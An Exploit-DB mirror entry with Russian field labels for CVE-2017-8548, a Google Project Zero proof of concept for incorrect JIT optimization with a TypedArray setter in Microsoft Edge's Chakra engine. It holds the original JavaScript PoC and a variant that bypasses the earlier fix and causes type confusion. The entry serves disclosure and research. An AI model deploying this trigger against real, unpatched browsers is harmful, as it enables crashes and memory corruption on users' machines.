- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 42473
- Проверка EDB
-
- Пройдено
- Автор
- GOOGLE SECURITY RESEARCH
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2017-8548
- Дата публикации
- 2017-08-17
Microsoft Edge Chakra - Incorrect JIT Optimization with TypedArray Setter #2
HTML:
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1290
I think the fix for #1045 is incorrect.
Here's the original PoC.
'use strict';
function func(a, b, c) {
a[0] = 1.2;
b[0] = c;
a[1] = 2.2;
a[0] = 2.3023e-320;
}
function main() {
var a = [1.1, 2.2];
var b = new Uint32Array(100);
// force to optimize
for (var i = 0; i < 0x10000; i++)
func(a, b, i);
func(a, b, {valueOf: () => {
a[0] = {};
return 0;
}});
a[0].toString();
}
main();
I just changed "var b = new Uint32Array(100);" to "var b = new Uint32Array(0);", and it worked well.
PoC:
-->
'use strict';
function func(a, b, c) {
a[0] = 1.2;
b[0] = c;
a[1] = 2.2;
a[0] = 2.3023e-320;
}
function main() {
var a = [1.1, 2.2];
var b = new Uint32Array(0); // <<--------- 100 -> 0
// force to optimize
for (var i = 0; i < 0x10000; i++)
func(a, b, i);
func(a, b, {valueOf: () => {
a[0] = {};
return 0;
}});
a[0].toString();
}
main();- Источник
- www.exploit-db.com
